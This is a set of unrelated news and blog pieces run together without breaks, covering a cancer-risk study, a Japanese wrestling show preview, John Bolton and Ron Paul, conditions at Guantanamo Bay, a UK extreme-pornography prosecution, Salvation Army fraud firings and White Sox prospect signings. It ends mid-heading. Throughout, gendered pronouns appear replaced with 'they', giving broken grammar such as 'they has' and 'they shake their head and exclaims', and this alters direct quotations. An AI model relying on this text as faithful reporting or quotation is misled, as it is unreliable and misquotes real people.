In January, a report in the journal Science tried to explain why some tissues were millions of times more vulnerable to developing cancer than others.
Their explanation came down to the number of times a cell divides, which is out of our control and gave rise to the 'bad luck' hypothesis.
In the latest study, a team of doctors from the Stony Brook Cancer Centre in New York approached the problem from different angles, including computer modelling, population data and genetic approaches.
They said the results consistently suggested 70-90% of the risk was due to extrinsic factors.
Image copyright Thinkstock
Dr Yusuf Hannun, the director of Stony Brook, told the BBC News website: "External factors play a big role, and people cannot hide behind bad luck.
"They can't smoke and say it's bad luck if they have cancer.
"It is like a revolver, intrinsic risk is one bullet.
"And if playing Russian roulette, then maybe one in six will get cancer - that's the intrinsic bad luck.
"Now, what a smoker does is add two or three more bullets to that revolver. And now, they pull the trigger.
"There is still an element of luck as not every smoker gets cancer, but they have stacked the odds against them.
Media playback is unsupported on your device Media caption 'Healthy lifestyle key to preventing cancer'
"From a public health point of view, we want to remove as many bullets as possible from the chamber."
There is still an issue as not all of the extrinsic risk has been identified and not all of it may be avoidable.
'Convincing'
Kevin McConway, a professor of applied statistics at the Open University, said: "They do provide pretty convincing evidence that external factors play a major role in many cancers, including some of the most common.
"Even if someone is exposed to important external risk factors, of course it isn't certain that they will develop a cancer - chance is always involved.
"But this study demonstrates again that we have to look well beyond pure chance and luck to understand and protect against cancers."
Dr Emma Smith, from Cancer Research UK, said: "While healthy habits like not smoking, keeping a healthy weight, eating a healthy diet and cutting back on alcohol are not a guarantee against cancer, they do dramatically reduce the risk of developing the disease."
Follow James on Twitter.
Hello everyone, it's your resident Michinoku Pro expert Ozzi Michi Fan with a preview of the upcoming end-of-year Korakuen Hall show for Michinoku Pro. Cataclysm, takes place on December 10, but won't air on Japan's Samurai TV until December 17.
https://www.facebook.com/MichinokuPro/photos/a.1173512182678443.1073741828.1173414982688163/1229949073701420/?type=3
If you've never checked out Michinoku Pro and are looking to jump head first into the company, this guide and show could be a great starting point for you. Here's a good primer from Puroresu Spirit to get us started:
“Michinonoku Pro-Wrestling, or Michinoku Pro or MichiPro for short, was founed in 1992 by The Great Sasuke as a community-based promotion for the greater Tohoku, North Eastern, region of Japan. The promotion is primarily focused on the lucha libre style of wrestling with many of their wrestlers dawning masks and special motifs as they compete in the ring.”
Now to the preview of tonight's show!
Kesen Numajiro vs Ken45°
The opening match of the show features two men in the need of some consistent momentum going into 2016, one more dire than the other. Kesen Numajiro spent seven months (from May to November) as a headline act, becoming to Tohoku Junior Heavyweight Champion after ending Syu Brahman's exactly one-year championship reign, Numajiro then went on to successfully defend the title against The Great Sasuke. But, as the old saying goes “pride comes before a fall” and in Kesen Numajiro's case, it was no different. Numajiro was enraged by Manjimaru, who attacked them post-match in October, leading to the near-unprecedented decision in which Numajiro announced Manjimaru to be their next challenger, and lost that subsequent match. Ever since then Kesen has slipped down the cards picking up losses along the way.
Ken45° hasn't felt such lows, but they haven't experienced such highs either, trading wins and loses all year, never gaining much traction, just being stuck in the middle, with Yappe-man #2 they won the 2015 Incredible Tag Tournament, builds momentum and then suffers a bunch of losses keeping them in place. Creating a solid foundation to go into 2016 and make a strong push for position before the imminent return of their ace; Fujita “Jr.” Hayato could really set Ken45° on a great path in the new year.
Jinsei Shinzaki, Ultimo Dragon, Eagles Mask & Yappe-man #3 vs Masked Buddy 2015 (Shinobu), Ryuichi Sekine, Takayuki Ueki & DASH Chisako
Here is the first Michinoku Seikigun vs Mu no Taiyo tag match. Korakuen Hall has become the stronghold of the Mu no Taiyo cult since their massive recruitment drive in back in April, where Mu no Taiyo (The Great Sasuke, Syu Brahman & Kei Brahman) held a 11-person “audition” battle royal, with the winner being chosen to represent Mu no Taiyo. After the match Sasuke & the Brahman's were so impressed by the devotion of those involved that they drafted ALL of them into the faction, growing it from a small 3-5 person sect to a full-blown 16-person religion, during the mid-year Korakuen Hall show, Mu no Taiyo went 2-for-2 in their matches decisively defeating the Michinoku Seikigun.
On the opposite end of the spectrum, the Michinoku Seikigun has their own spiritual leader; Jinsei Shinzaki. Back in June at their previous Korakuen Hall show, they gathered some other wandering heroes (Osamu Namiguchi & Survival Tobita) to do battle with the primary Mu no Taiyo force (Sasuke/Brahmans) and were defeated by the numbers game of the believers at ringside.
On December 10, the Seikigun will face Mu no Taiyo on two battlefronts once again, this time, the b-team step up against the demoted Shinzaki squad, featuring an Eagles Mask, who ate the fall for their team in June after an astonishing ego-trip, star recruit Ultimo Dragon who has been involved in a few Mu no Taiyo skirmishes during the year and wildcard; Yappe-man #3 brought in to offset the inter-gender nature of Mu no Taiyo.
Manjimaru & Takeshi Minamino vs Rui Hyugaji & Kenbai
Current Tohoku Junior Heavyweight Champion Manjimaru slums it in a tag match with long-time tag partner Takeshi Minamino, both men representing the BAD BOY faction and more specifically the Toneri Family tag team. Manjimaru's first championship defense will take place in 2016, with their challenger being selected out of 12 men who will participate in the “M-12 Time Difference Battle Royal” which will be held on January 9, 2016. All men completing in this match, excluding Manjimaru, but including their partner, will participate, so Manjimaru is potentially facing off against or teaming with their upcoming and first challenger for the first singles championship they have ever held.
Tohoku Tag Team Championship Match
Ikuto Hidaka (C) & Minoru Fujita (C) vs Daichi Sasaki & Ayumu Gunji
Here is a big one, the Tohoku Tag Team Championship rematch, in September NEW PHASE (Sasaki & Gunji) were the tag team champs and faced their greatest challenge yet, the veteran team of Hidaka & Fujita, formerly members of the destructive SKULL & BONES faction that terrorized MichiPro's past. It's a clash of generations, Hidaka & Fujita both have 18 years experience, while Sasaki & Gunji both have five or fewer years under their belts. This match asks the question, now that both teams are familiar with each other after their first encounter, do Hidaka/Fujita still have it vs do Sasaki/Gunji have it yet and which is the more powerful dynamic?
Great Space War
The Great Sasuke, Syu Brahman, Kei Brahman, Ultraman Robin & Master E.T. (Mini-Master) vs Darth Vader GAINA, Donglin Yoda (Taro Nohashi), Superman Kinya, C-3PO #1 (Yappe-man #1) & R2-D2 #2 (Yappe-man #2)
It's the 10th anniversary of Michinoku Pro's annual end-of-year spectacle hardcore brawl, The Great Space War/Battle in Outer Space, in recent years it has been tied to a movie theme. This year it has a Star Wars, Batman vs Superman & E.T. theme attached to it with many wrestlers representing characters from the films. But first a bit of history.
The Great Space war is a long-running series of matches that originally pitted The Great Sasuke (and guests) vs the Sato Brothers (Brahmans-past, pretty boys who were in an pop-idol group with Taiji Ishimori, if you can believe it).
They were brought into Sasuke's path as GAMMA's lackey's and once GAMMA was forced to leave the promotion (after losing a high-stakes Cuban Deathmatch to The Great Sasuke) the attention shifted to them and the brothers weren't going to back down either, sacrificing one of their hair in an attempt to unmask Sasuke and end the career of Dick Togo, they failed and Kei Sato was shaved. But they still had one more chance, one more hair to put on the line, so Shu Sato battled Sasuke 1-on-1 in a chain match, to avenge their brother's hair and ensure they did not lose it in vain. The match escalated to outrageous levels, fighting in the streets, in traffic, off of an overpass, among trees and once back in the ring, fireworks and fire got involved, as Sasuke and the Sato Brothers stubbornly kept raising the stakes, in the end Sasuke was victorious and The Sato Brothers were left battered, bald and beaten. Most importantly, they were beyond the point of turning back.
This lead to the first Space War, a Korakuen Hall cage match in 2006 and many to follow (one every year to be precise), involving Ricky Fuji, Atsushi Onita, Jushin Liger & Survival Tobita among others. In 2010 The Sato Brothers were defeated in a loser leaves MichiPro Space War, but returned the next year as The Brahman Brothers. I mentioned in the recent years these battles have had cinematic themes such as Ultraman, Batman, The Avengers, Magic Mike & Ninja Turtles. But the most significant development in this saga came in 2013, where after eight years of war, the Brahman Brothers finally bested Sasuke, who upon this defeat realized what they had created; two men, cut from the same cloth as themselves going down the same path committed to the same fight, all three men came to the conclusion that together their goals could be achieved without opposition and an unholy union was formed.
But as always, from Kai En Tai, to SKULL & BONES, Kowloon to ASURA & BAD BOY, The Michinoku Seikigun is always at hand to defend the promotion from various factions looking to seize power for themselves and this year, in this final moment it falls to GAINA to defend Michinoku Pro, GAINA the deserter. In 1999, GAINA, then known as Kazuya Yuasa partook in Super Delfin's exodus to create Osaka Pro, GAINA has since returned sporadically as various characters from the masked Shisaou to the largest of the Kameshi-Ninja Turtle clan; Kamegoro. But in August GAINA made their return to full-time MichiPro competition after wrestling at Taro Nohashi's 8th anniversary of OOGAMANIA (MichiPro Dojo shows).
Most recently leading up to this big event, GAINA has built up a rivalry with Mini-Master, as the largest and smallest members of the MichiPro roster, Mini-Master's constant interference in matches has irritated GAINA to the point of physical violence, leading to the men facing off in a singles match, where the Mini-Master, who was at a severe disadvantage, even with help from the Brahman Brothers, was defeated and unmasked by GAINA, revealing an E.T. mask underneath and with that, it was time, that time of year, Space War season. The Great Space War loomed near, post-match the Yappe-men (another constant in Space Wars) presented GAINA with a Lightsabre, GAINA replied by breathing heavily into the microphone before leaving the ring to Darth Vader's theme. The following night Darth GAINA debuted in a wild 6-man “ring deconstruction” match in which GAINA teamed with Yappe-man #1 & #2 against The Great Sasuke, Syu & Kei Brahman, a prequel to the Battle in Outer Space. Yappe-man #2 picked up the win, post-match, Taro Nohashi was revealed to also be a Jedi and enlisted in the Korakuen Hall main-event against Mu no Taiyo, this caused The Great Sasuke to launch a second wave attack against the Seikigun, siccing the Brahman's on them, all fell to the rabid attack including new-found Jedi; Nohashi, Kinya Oyanagi (who was at ringside) tried to protect Nohashi by covering their body with their own, only to also be caught up in the assault, beaten and stripped, only to be revealed as….. Superman, in full attire, mild-mannered Kinya Kent, thrust into greatness repelled the Brahman attack and laid out Sasuke. The Michinoku Seikigun team complete. With the announcement of the return of Dark Knight Sasuke and Ultraman Robin to the Mu no Taiyo side, both teams were set and a galactic war would soon be unleashed.
For more information, be sure to head over and “like” the English Michinoku Pro hub on Facebook to keep up-to-date and fully stocked on MichiPro news, photos, results, upcoming events and more at: https://www.facebook.com/MichinokuPro.
UPDATE BELOW
In an apparent change of heart, former U.S. ambassador to the United Nations John Bolton said they would “seriously consider” serving under Ron Paul after previously saying that Paul's foreign policy is worse than President Obama's.
On Fox Business Channel's Freedom Watch with Judge Andrew Napolitano, Bolton said “I would seriously consider serving in a Department of Defense under Ron Paul, if asked,” according to Napolitano's Twitter and Facebook accounts.
Just two weeks ago, Bolton said on Sean Hannity's Fox News show that Ron Paul's foreign policy is “worse than the Obama administration.”
“That's why I think the debate on the Republican side is so important and why when I see — I have to be candid — a candidate like Ron Paul whose foreign policy is, if anything, worse than the Obama administration apparently leading in Iowa according to some polls, it just gives me great concern,” Bolton said.
A request for comment has been submitted to Bolton.
Update 11:24: Bolton emails: “Although the likelihood of such a scenario is remote, I would serve to try to persuade Ron Paul toward a more realistic posture in defending the United States and its worldwide interests.”
The ghosts of Guantanamo: Prisoners declared innocent... but never let out. Their jailers driven mad by the horrendous conditions. From the shadow of the original Camp X-Ray, a disturbing report from the grim camp justice forgot
It's 8am and the Star Spangled Banner blares out from a speaker next to McDonald's. Around me, young men and women in uniform put down their Egg McMuffins and leap to attention to salute the American flag fluttering gently in the Caribbean breeze.
A few miles away, Shaker Aamer, the last British prisoner at Guantanamo Bay, starts their day in an 80sq ft cell where they have been locked up for the past 12 years. The 45-year-old married father of four – who has been cleared for release since 2007 – faces what they call the ‘living hell' of being held without charge inside the world's most notorious prison.
Last week The Mail on Sunday travelled to the remote US naval base on the tip of Cuba where 154 prisoners from 21 countries remain trapped in legal limbo and where lizards have more rights than humans.
Scroll down for video
Deserted: Camp X-Ray, pictured is empty and over-run with weeds, while detainees are now housed in Camps V and VI,
And we discovered a surreal world where both guards and prisoners are cracking up in a hellhole President Obama vowed to close when they were first elected in 2008.
Driving around the 45-square-mile base with a US Army public relations sergeant who constantly repeats the official mantra that our visit ‘shows the transparency of what we do here' we pass ‘Iguana Crossing' signs near dozens of the creatures dozing in the 90F heat. Soldiers are forced to stop when an iguana wishes to cross the road. Violating this order is punishable by a fine of up to $10,000 (£6,000).
Clive Stafford Smith of the legal rights charity Reprieve, who has represented Mr Aamer for ten years, says: ‘The iguanas have way more rights than the prisoners.
‘Shaker has been cleared for release and yet remains trapped in a nightmare where force-feedings and beatings are commonplace and where they have to undergo a scrotum search to speak to me on the phone.'
Camp X-Ray, where the notorious pictures of cowering prisoners in orange jumpsuits were taken, is now an empty shell, over-run with weeds and giant banana rats. Razor wire rusts and vines trail through the cages. A lone vulture circles overhead.
Today, prisoners are housed in Camps V and VI, with the most high-profile – like alleged 9/11 mastermind Khalid Sheikh Mohammed – held at a secret Camp VII, which troops from the US Joint Task Force are forbidden from discussing.
Still jailed: Shaker Aamer, holding with two of their children, son Michael and daughter Johninh, is the last British prisoner at Guantanamo Bay despite being cleared for release in 2007 A detainee in Camp VI, where 'compliant' detainees are allowed to spend days in a communal area, paces in circles wearing headphones wirelessly connected to an iPod Behind bars: A detainee carries out morning prayer in an outside area of Guantanamo Bay 'Humane treatment': The restraining chair used for force-feeding detainees who are on hungerstrike
The jail remains a thorn in the side of President Obama, who blamed political opponents for thwarting their plan to close it by refusing to allow terror suspects to be moved to prisons on mainland America.
Prison commanders privately admit that it will probably remain open long after Obama leaves office in January 2017.
The military has developed its own ‘double-speak' on Guantanamo. When I ask about ‘prisoners', I am immediately corrected ‘They are detainees, ma'am.'
Likewise solitary confinement is ‘a single cell operation', suicide is ‘self-harm', force-feeding is ‘enteral feeding' and censorship is ‘Opsec' (operational security), which means all photographs have to be vetted according to the rules – namely, no prisoners or guards can be identified and the base's security is safeguarded.
I ask the army spokesperson why they erased one photograph taken on the ferry used to shuttle passengers across a pristine piece of water from Guantanamo Bay airport to the Guantanamo Bay Naval Base, known as Gitmo.
‘You can clearly see the coastline and that would give the bad guys an idea of the cliffs, our defences and where best to stage an attack,' they reply solemnly.
When I point out that I had looked at the entire base on Google Earth in my hotel room the night before, they shake their head and exclaims: ‘Darn!'
We are allowed to photograph Titan, a new arrival at Gitmo.  They are a two-year-old Boxer, a trained therapy dog brought in to help guards deal with the stress of working 12 hours a day, six days a week for a year-long posting with just one week's holiday midway through.
There is a standing joke at Gitmo that troops here fall into one of three categories – hunks, monks and drunks.
Solder's best friend: Titan the therapy boxer helps soldiers cope with the stress of working on Guantanamo
One soldier who is regularly subjected to ‘splashing' – where prisoners hurl a mixture of faeces and urine – told me: ‘The detainees are locked up but we're prisoners too.
'My buddies think I'm on a Caribbean island so it must be great. The reality is I work the same cellblock every day.
'They scream ‘Death to America!'. It's a high-stress environment. Some guys crack.'
Another adds: ‘I miss my girlfriend and family.
'Man's best friend is a dog and petting Titan is great therapy. All you do here is work, work-out and drink.'
Two former guards were last week charged in Texas with raping and sexually assaulting female subordinates.
Medics refuse to give figures but admit cases of depression, anxiety and stress are widespread – on both sides of the razor wire. J
oint Task Force Commander Rear Admiral Richard Butler confirmed to The Mail on Sunday that guards are routinely taken off patrol if prisoners find out their real names.
‘These guys are in constant contact. If the detainees can figure out the name of a guard and get personal information on him, that's disturbing.
‘We watch the guards closely. We have moved guards off duty.'
They say they has ‘empathy' for the prisoners but refuses my request to interview their sole remaining British captive, citing the Geneva Convention.
I produce a letter from Aamer's lawyer waiving their Convention rights, but the admiral shakes their head, saying ‘nice try'. Later in the hospital, a medical officer shows off a restraining chair used for force-feeding, a practice the American Medical Association calls ‘inhumane'.
The doctor shrugs: ‘I was disappointed by that statement. We go out of our way to make it safe, humane and respectful. The first thing I did when I arrived here was have a nurse place a tube in me. It didn't hurt.
‘I sleep well at night. Five years from now they will be alive because I kept them alive.' We are taken to see prisoners in Camp VI, where ‘compliant' detainees are allowed to spend days in a communal area where they can share food, watch TV, read books and magazines in a variety of languages including Pashtu and Farsi, and workout in a small outdoor exercise area. They take English, Spanish, science and horticultural classes.
Harry Potter books and copies of National Geographic are the most widely requested. We look at them through one-way glass. The officer in charge says: ‘They can't see or hear us.'
One man paces in circles wearing headphones wirelessly connected to an iPod playing music. I tell the officer they remind me of a polar bear I saw at the zoo who repetitively circled their enclosure for hours. ‘Yes ma'am,' they reply, ‘A lot of these guys have issues. But they are treated better than we would be treated if the roles were reversed.'
The camp's female psychiatrist routinely treats inmates for depression, stress, lack of sleep and anxiety. Mental health goes hand-in- hand with their physical well-being,' they say.
‘We are caring for an aging population now with hypertension, diabetes and basic aches and pains.
‘We work with them one-on-one using image therapy and counselling. Most understand English. If they require antidepressants we prescribe them.'
Once you are in...: A guard enters the main gate of Camp 5, THE maximum security facility at Camp Delta at Guantanamo Bay
Library books routinely have pictures of women scratched out by prisoners. They smile and says robotically: ‘I've never had any issue being a woman. For the most part they are welcoming and appreciate the care we give them.'
Next door in Camp V – where Aamer is housed – prisoners get fewer privileges and are forced to wear an orange jumpsuit instead of the prison white or tan uniform if they are branded ‘non compliant'.
We are told ‘several' prisoners remain on hunger strike but the exact number is classified.
In a recent letter, Aamer said they were one of 35 hunger strikers: ‘I am living just to die. Dead people are better off than us. They are living a new way of life knowing that they are dead. I feel numb. Years are passing like months and months like weeks. I feel lonely and lost.'
Their lawyer claimed prisoners like the ones ‘paraded' in front of The Mail on Sunday last week get special privileges.
Mr Stafford Smith said: ‘They agree to be paraded in front of the media and then get extra privileges like more books and access to pornography.'
That was vehemently denied by the military spokesperson, who said: ‘The prisoners will say anything to get attention. The war on terror has turned into a war of words.'
Obama's goal of shutting the jail seems further away than ever. Rear Admiral Butler confirmed troop rotas extend ‘for several years' and work on a new $2 million sports complex continues apace.
The base boasts a cinema, baseball diamond, supermarket, Starbucks coffee shop, Irish pub, radio station, Caribbean barbecue joint and even a beauty shop.
A stone's throw from the prison are stunning beaches, bougainvillea-covered housing, a Taco Bell and a gift shop selling Guantanamo T-shirts and fridge magnets.
There is something surreal about this little piece of Americana – originally leased from Cuba in 1898 as a strategic navy base –sitting next to a detention camp housing terrorists including Abd al-Rahim al-Nashiri, a Saudi who allegedly planned the 2000 suicide bombing of the USS Cole in Yemen, and Mohammed al-Qahtani, accused of trying to enter the US as the 20th hijacker on 9/11.
Slowly, some of the 80 or so prisoners who have been cleared for release are being moved. Uruguay recently agreed to accept five and there are commission hearings into the fate of others set for next month.
Andrew Holland, the Wrexham man who was famously prosecuted for possessing a clip of a woman having sex with a man in a tiger costume, has challenged Section 63 of the 2008 Criminal Justice and Immigration Act, popularly known as the Extreme Pornography Act. In a letter to the head of the Crown Prosecution Service, Holland's solicitors have claimed that even five years after its enactment, the law is so unclear and poorly understood – including by police, prosecutors and solicitors – that it too easily traps the innocent. Assisted by a specialist legal team and advised by the sexual freedom campaigning group Backlash, the former defendant has called on CPS head Allison Saunders to review the implementation of Section 63; if no such review is forthcoming, the law will be challenged via judicial review.
Holland's case illustrates the damage that can be caused by this poorly understood law. They were an ordinary man who loved jokes, the more outlandish the better. They had received the tiger clip, and another six second clip depicting simulated damage to a man's genitals, as laddish jokes from friends. The friend had shared the clips as part of a braggart, bravado-tinged culture where online buddies swap videos intended to shock. “Unfortunately one of my friends sent me a load of jokes…some of them were hilarious, but unfortunately there were two on there that were classed as obscene,” says Holland.
In the tiger clip, after copulating with the woman, the costumed man looks up and says to the camera: “That beats doing Frosties ads for a living!” Clearly, it is not real; it's a joke, albeit not to everyone's taste, and it isn't meant to be banned under the Act. But when Holland's phone found its way into the hands of police in 2009, over a matter which was never pursued by them, they found themselves charged with possessing extreme pornography, their name plastered across newspapers and websites. “When I went to court, neither my solicitor nor the people at the court understood the new law,” they say.
The trial process showed that lack of understanding. When they had charged Holland, the CPS had not yet heard the clip's audio, which contained the tiger's tell-tale punchline. Upon finally hearing the audio, they dropped the charge, but Holland would still have to face trial for the second charge, relating to the six-second clip of simulated genital damage. They pleaded not guilty, but when the jury saw the clip, their lawyers read their shocked reactions and advised them to change their plea to guilty. They followed their lawyers' advice, and a date for their sentencing was set.
Were it not for the support of Backlash campaigners, the story of Andrew Holland might have ended there. They could have faced a custodial sentence, and any conviction would almost certainly damage their career and personal life. Fortunately for him, the sensational media reports of the “Tiger Porn” case had spread widely, and came to the attention of Backlash. Through their networks, Backlash activists reached out to Holland; when they were finally able to reach him, they had already made their plea. With specialised advice and support from legal experts, they applied to have their guilty plea vacated before sentencing. This was granted, which meant that they would stand trial again, in the knowledge that they had a defence.
This time, they were ready. With the help of civil liberties lawyer Myles Jackman, who frequently advises Backlash, Holland's legal team had assembled a panel of experts to dispute the pornographic nature of the clip, highlighting that they had been sent without permission, in jest. Eventually, again, the CPS dropped the charges, possibly because they wished to avoid embarrassment in a high-profile, well-informed challenge to the controversial Act.
Holland was cleared, but they had to piece their life together after the many months of litigation. The media furore led to job loss and public ridicule, as their name was publicly associated with illegal pornography. “People were talking…vigilantes and people threatening, I was beaten up on more than one occasion…I was living in fear of my life,” they say. Even today, the ubiquity of the case on the internet worldwide links their name permanently to an embarrassing episode of their life; though they were cleared, they are still at risk, and has moved to an area where nobody knows him. The charges still appear on some background checks, which make it hard for them to find work. “[The story] went everywhere around the world – my name, my address, my age and everything,” they say. At any time, an internet reader might search their name, find old news reports, and skim the headline without following the complexities of their case. In the mind of that skim-reader – perhaps a colleague or neighbour – they will be forever linked with perversion, with deviance.
Holland hopes to prevent anyone else from falling foul of a law that they feel is not fit for purpose. “I want to clear my name, and put the point across to people that are ignorant in their understanding of extreme pornographic images…People showing a cartoon clip on their mobile phone in a pub face being in the same position as me, even though they've got no knowledge that what they have is illegal,” they say.
Without a CPS revision of the guidance around Section 63, or its overturn in a successful judicial review, it is very likely that more innocent people will be exposed to the indignity of arrest and the damaging consequences of unjust conviction. Backlash has worked with many people who feel they were unjustly accused. They have heard from those who were reported to the police to satisfy a grudge, and those who police charged after discovering images during investigation for other issues. With increasing availability of high-speed wireless Internet, and the popularity of social media and instant messaging services like WhatsApp, it's increasingly easy to be carrying an offending image around in your pocket.
According to Jackman, the new technology creates unprecedented opportunities for people to pass illegal images around unknowingly. “You have a group of people who communicate by text or app messaging services, and a member of the group may post something as a joke without realising it's illegal. I've sent you an image, you haven't asked for it, you don't know what it is. You could be in possession of extreme pornography and could be arrested for being in possession of it…We are seeing an increasingly large amount of this. [Prosecution is] not limited to people with alternative sexual preferences, but is now an issue which affects the entire adult population,” they say.
In the challenge, Holland's legal team, advised by Backlash, emphasise the Act's violations of human rights. With the concept of “extreme” pornography poorly defined, and without reliable guidance from CPS to prosecutors, individuals find it difficult to determine what is and isn't legal. Perhaps, this is why a law which experts predicted would get less than 30 cases a year has had over 5,000 convictions since its inception. It's impossible to know how many people have pleaded guilty to possession of images that were not actually unlawful. “I can only assume that a vast proportion of people caught will have been affected in the same way as [Holland],” says Jackman. Even if only a few of those cases were like Holland's, or like the case of former Boris Johnson aide Simon Walsh (whose career was destroyed when they were accused), the law's impact on social freedoms is disproportionate to any social good that it has caused.
This challenge comes at a time of contrasting trends around sexuality and morality. Racy erotica is available on the shelves of bookshops in every high street, but much of society exists in a moral panic, and even a whiff of this fear can ruin lives and tear communities apart. It is the duty of our judiciary to uphold the core, liberal values of human rights and freedom of expression, not to give into moral panic. In holding the justice system to account, Holland and their lawyers can stem the tide of panic, but only society as a whole can decide to reject it altogether. “I think liberalism always wins eventually but it takes time; there's friction between more progressive impulses and more conservative ones, and when it comes to social issues, be it gay marriage or slavery, these debates can be very short or they can be very long-lived,” says Jackman. “Eventually I think when it comes to sexual morality, which is clearly not a state politics issue but a personal one, these things will change, it just takes time,” they say.
Mere days into its high-profile Christmas kettle drive and a busy donation season, the Salvation Army is grappling with two separate scandals that have led to senior personnel losing their jobs.
On Tuesday, the Salvation Army in Toronto announced $2-million worth of toys had disappeared from one of its major warehouses over a two-year period. It ordered an internal audit into the “irregularities” at the Railhouse Road warehouse and on Monday fired executive director David Rennie, said Major John Murray, spokesperson for the Salvation Army's Ontario Central East Division.
A day earlier, news broke in Ottawa that the executive director of the Salvation Army Booth Centre had been fired after an internal audit found nearly $250,000 had gone missing over an eight-year period. Perry Rowe had headed up the centre for the past eight years.
Both cases have been handed off to their respective police departments — no charges have been laid in either case.
“I think it's important for people to understand that in both cases … the Salvation Army has been victimized,” said Maj. Murray, who characterized this as a “troubling time” for the organization in terms of leadership.
When you're defrauding the Salvation Army, you're defrauding the most vulnerable in the community
“When you're defrauding the Salvation Army, you're defrauding the most vulnerable in the community. That, for us, is very troubling.”
In the Toronto case, a whistleblower first alerted senior management to “irregularities” at the warehouse in mid- to late-August, Maj. Murray said. The Salvation Army's national office conducted the audit. Mr. Rennie, who had been suspended since September, was let go on Monday.
In the third week of September, the national office called in the Toronto police department, which launched its own investigation. The Salvation Army also put its insurer on notice and that company has now hired external forensic auditors specializing in criminal audits, Maj. Murray said.
The Salvation Army also hired KPMG to do a separate procedure and security audit to determine lessons learned.
“We certainly have extraordinary checks and balances in place,” the major said of the warehouse, which suffered a fire in 2008. “The security at the facility is excellent.” The locks were changed at the end of August after the initial audit got in motion, they said.
The executive director was the only job loss as a result of the audit, Maj. Murray added.
The Salvation Army appointed a new executive director of the busy warehouse, which moves about seven million pounds of food every year and is housing more than 140,000 toys for the annual CTV Toy Mountain campaign, about to kick off next week.
Recently retired civil servant Betty Lynn Stoops is now at the helm. The former head of internal audits at Customs Canada worked with the Prime Minister's Office and the Privy Council office, Maj. Murray said.
The organization will continue to do criminal record checks on all its volunteers and employees, they added.
The Salvation Army was notified of financial irregularities in Ottawa only five weeks ago, Maj. Murray told the Ottawa Citizen, and the subsequent internal audit found that approximately $240,000 had gone missing over eight years.
I can tell you the Salvation Army will do due diligence to ensure that we get every nickel back
Like Mr. Rennie, Mr. Rowe was initially suspended with pay but was later fired.
The Booth Centre's accounting services will be transferred to the regional accounting operations in Toronto, Maj. Murray said, and the Ottawa Police are continuing their investigation.
“Sometimes people think they can prey on a charity, but I can tell you the Salvation Army will do due diligence to ensure that we get every nickel back and that every stone is unturned throughout these investigations,” they said.
• Email: sboesveld@nationalpost.com | Twitter:
The Chicago White Sox have kicked off the July 2 period with the signings of the following five prospects; Franklin Reyes ($1.5m), Fernando Tatis Jr. ($700k), Santo Vasquez ($300k), Harvin Mendoza and Brayant Nova ($100k). Reyes and Tatis were both first reported by MLB.com's Jesse Sanchez, Vasquez by the Dominican Prospect League, Mendoza by Baseball America, and Nova by the White Sox.
Update: There have been mixed reports on Fernando Tatis Jr's bonus. Some have it listed as $700k (Ben Badler, Dominican Prospect League, John Heyman) and others have it as $825k (Jesse Sanchez/MLB.com). The Dominican Prospect League later stated that it was $700k with a $100k scholarship, so that may be where some of the confusion came from.
Reyes is the top rated prospect and received the largest bonus of the five. They rank within the top 30 international prospects this year by Fangraphs (#30), MLB.com (#30) and Baseball America (#27). Tatis Jr. ranks outside Fangraphs' top 47 prospects, and likely falls somewhere in the 50-60 range. MLB.com are the highest on Tatis Jr., ranking them at #27, above Reyes, and Baseball America have them somewhere in the 31-60 range. Harvin Mendoza only appears in Baseball America's “more prospects to watch” section, along with Tatis Jr., which would also put them somewhere in the 31-60 range. Santo Vasquez and Brayant Nova were both unranked by all three outlets.
The White Sox have an allotted signing pool of $3,443,000, which is the seventh highest bonus pool this year. With these signings the Sox have already committed at least $2.6m, or 75.5% of their total pool. They could potentially trade for an additional 50%, bringing their total pool up to $5,164,500, but they haven't opted to do this in the past and it's probably not going to happen this year. As always, we should expect more signings over the coming months. Last year the Sox announced 4 signings on July 2, but ended up inking at least 14 additional players during the rest of the signing window.
Below you can find scouting reports and information on the prospects signed today. Make sure to keep checking back throughout the day, as well as following our Twitter feed, as we will continue to update both with more information as/when/if it becomes available.
Franklin Reyes, OF, Dominican Republic:
Reyes, 16, possesses big power from the right side of the plate. Kiley McDaniel rates Reyes' raw power as a 60/65 tool (current grade/future grade), which ranks second in this international class behind only hulking 1B Jhailyn Ortiz, and in a tie with Vladimir Guerrero Jr. MLB.com credit them as having the best raw power in the entire class, placing a 70 FV grade on their power tool, ahead of both Ortiz and Guerrero Jr., who each received a 65 grade. Baseball America's lack of tool grades makes it a little more difficult to compare player-to-player, but they do note “Reyes' plus raw power ranks among the best in the class.” It's easy to see why the White Sox are enamored by Franklin Reyes. Their raw power is a potential game-changing tool.
Power is not Reyes' only standout tool. They also have an excellent arm. Kiley McDaniel gives their arm strength a 55 grade, which is tied for sixth best in the class. Baseball America likes their arm a little more, saying that it “earns 60 to 70 grades, and they earn praise for their accuracy as well.” MLB.com also place a 60 grade on their arm. This strong power/arm combo allows Reyes to profile as a prototypical right fielder.
After the power and arm, things start to fall apart a little for Reyes, hence why they are ranked towards the back of the top 30 lists. He's slow and projects to be below average defensively. BA says that they “has limited speed and agility in the outfield” and that he's “nowhere near the same athlete as Micker Adolfo.” MLB.com and Kiley McDaniel give Reyes' run/speed tool a 30 and 40 grade respectively, both significantly below average. They also both gave them below average fielding grades of 40 and 45 respectively. Reyes is 6'3”, 235, and if they continue to get any bigger (he put on 30 pounds over the past year per Baseball America) then they could start moving into DH territory.
The real concern for me when it comes to Franklin Reyes, however, is with their hit tool. Baseball America describes their approach as being “aggressive, raw, with a lot of swing-and-miss, especially against breaking pitches” and they call their swing “long and loopy.” MLB.com give their hit tool a 30 grade, which equates to something like a .220 batting average, though their write-up is rather more promising as they say, “He's also shown the ability to hit in games” and “he continues to make strides on that front.” Kiley gave them a 45 future hit tool grade (.250 AVG), which doesn't sound too bad, but it was tied for the lowest future grade that they gave to any prospect. Baseball America did mention that they were perhaps selling out for power on the showcase circuit, so they could see big improvements once they enter the system and starts receiving better instruction, though the White Sox don't exactly have a strong track record for developing this type of raw hitter. Reyes does have the plus bat speed to hit for average, and may just need to make a few adjustments to their swing.
Overall it's no surprise that the Sox coveted Franklin Reyes. They possess the raw power that they love and if they can become even a 45-grade hitter, then they should be an impact bat for this team somewhere down the line. That said, the risk level and bust rate for Reyes is extremely high, even relative to the typical high profile international signing. As Kiley McDaniel mentions “the track record of July 2nd prospects who can't even play an up-the-middle position at age 14 or 15 isn't encouraging.” Hopefully Reyes will prove to be the exception.
Franklin's bother, Franmil Reyes, is currently a prospect in the Padres system. Franmil signed for $700k back in 2011.
Fernando Tatis Jr., SS, Dominican Republic:
